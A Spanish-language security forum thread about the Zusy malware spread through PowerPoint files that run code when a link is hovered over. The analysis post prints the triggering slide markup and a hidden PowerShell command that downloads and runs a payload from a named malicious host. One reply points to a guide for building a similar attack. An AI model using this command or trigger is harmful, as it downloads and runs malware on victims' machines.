Otra modalidad malware para conocer de PowerPoint

  • 2 Respuestas
  • 3908 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado xhc1

  • *
  • Underc0der
  • Mensajes: 76
  • Actividad:
    0%
  • Reputación 0
  • Aprendiz del conocimiento, amante de la simplicidd
    • Ver Perfil
    • Email

Otra modalidad malware para conocer de PowerPoint

  • en: Junio 09, 2017, 11:38:00 am

A diferencia de otros archivos de Microsoft Office que contienen macros maliciosas, el documento que ha sido descubierto utiliza comandos PowerShell, y simplemente con pasar por encima el ratón de un enlace (mouse hover) se activa la secuencia del payload.


Una nueva variante de un malware llamado "Zusy" se ha encontrado en la propagación como un archivo de PowerPoint adjunto a correos electrónicos de spam con títulos como "Orden de Compra # 130527" y "Confirmación". Es interesante porque no requiere que el usuario habilite las macros para ejecutarse.

 


La mayoría del malware de Office se basa en que los usuarios activan las macros para descargar alguna carga útil ejecutable que hace la mayoría de las cosas maliciosas, pero este malware utiliza la función del programa externo en su lugar.

Este ataque explota una característica legítima de PowerPoint. Colocar el cursor sobre un hipervínculo en una presentación puede desencadenar macros, llevar al usuario a la siguiente diapositiva, reproducir un sonido, abrir una página web o abrir una aplicación externa. La mayoría de los ataques malware basados en documentos a través de PowerPoint usarían macros para descargar la carga maliciosa, pero ahora que Office bloquea macros por defecto y más usuarios saben que no las habilitan, los atacantes están buscando otras formas de engañar a los usuarios.

Cuando se abre el archivo malicioso de PowerPoint, muestra una pantalla con un solo enlace que dice "Cargando ... espere":

En caso de que la víctima pase el cursor del ratón por encima de este link se ejecutará un código malicioso que intentará conectarse a una página web para descargar malware en el ordenador. Por tanto, ni siquiera es necesario hacer clic en el enlace, un detalle que ha llamado la atención de los investigadores de seguridad.



    <a:hlinkMouseOver r:id="rId2" action="ppaction://program"/>


En efecto se puede ejecutar un comando al pasar por encima de un enlace en un PowerPoint:

    http://python-pptx.readthedocs.io/en/latest/dev/analysis/shp-hyperlink.html#run-a-program


    ppaction://protocol 


Para usuarios con vista protegida deshabilitada o cuando los usuarios ignoran la ventana emergente y permiten que el código se ejecute, el código malicioso de PowerShell intentará conectarse a http://cccn.nl/c.php y descargar otro archivo.

Y el comando desofuscado en PowerShell hace que visite la URL maligna (hxxp) que descarga un fichero .JSE
Esto indica que es un archivo JScript Encoded codificado que es ejecutado por WScript para descagar un fichero EXE

    powershell -NoP -NonI -W Hidden -Exec Bypass

     "IEX (New-Object System.Net.WebClient).

    DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\");

     Invoke-Item \"$env:temp\ii.jse\""

 
Si el usuario tiene habilitada la función Vista protegida, que de acuerdo con Microsoft está activada por defecto tanto en Windows Defender como en Office 365, PowerPoint detendrá el ataque y mostrará un aviso de seguridad.

Algunos análisis completos y muestras del malware en inglés:

    https://sentinelone.com/blogs/zusy-powerpoint-malware-spreads-without-needing-macros/
    https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/
    https://blog.nviso.be/2017/06/07/malicious-powerpoint-documents-abusing-mouse-over-actions/

Algunos expertos de seguridad aseguran que PowerPoint Viewer, al no ser compatible con la ejecución de programas externos, no está afectado por este fallo.

Fuentes:
http://computerhoy.com/noticias/software/detectado-nuevo-malware-que-infecta-tu-ordenador-powerpoint-63234
https://www.redeszone.net/2017/06/07/ocultar-malware-powerpoint-sin-macros/
« Última modificación: Junio 09, 2017, 01:47:52 pm por Gabriela »

Desconectado ZanGetsu

  • *
  • Ex-Staff
  • *****
  • Mensajes: 329
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • I ZanGetsu
  • Skype: thenicox
  • Twitter: black_zangetsu
    • Ver Perfil
Hoy salió un post en el blog de chema, donde explica tambien todos los pasos para crear meterpreter con la maquina;


Lo dejo como anexo al post :D

Fuente:
Código: [Seleccionar]
http://www.elladodelmal.com/2017/06/zusy-como-un-powerpoint-entrega-tu.html
« Última modificación: Julio 20, 2017, 06:31:53 pm por xyz »

Desconectado M03's

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Otra modalidad malware para conocer de PowerPoint

  • en: Agosto 23, 2017, 12:58:51 pm
Hola, está  muy bueno  toca probar antes de que lo parchen 

 

Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección.

Iniciado por d0r127

Respuestas: 2
Vistas: 3952
Último mensaje Noviembre 21, 2016, 06:15:12 pm
por d0r127
Dendroid - Troyano para Android (Con codigo Fuente)

Iniciado por ANTRAX

Respuestas: 23
Vistas: 25687
Último mensaje Octubre 23, 2020, 01:09:04 am
por taliban1707
Sitio web: No More Ransom [Tools para descrifrar ransomware]

Iniciado por Gabriela

Respuestas: 0
Vistas: 2868
Último mensaje Julio 26, 2016, 01:18:26 pm
por Gabriela
Creando un Ransomware para Android desde 0!

Iniciado por user_en1gm4

Respuestas: 14
Vistas: 12358
Último mensaje Marzo 22, 2018, 01:12:17 pm
por user_en1gm4
Underc0de Anotador [Especial para Modding]

Iniciado por Baku

Respuestas: 3
Vistas: 4523
Último mensaje Octubre 12, 2014, 05:55:20 pm
por Baku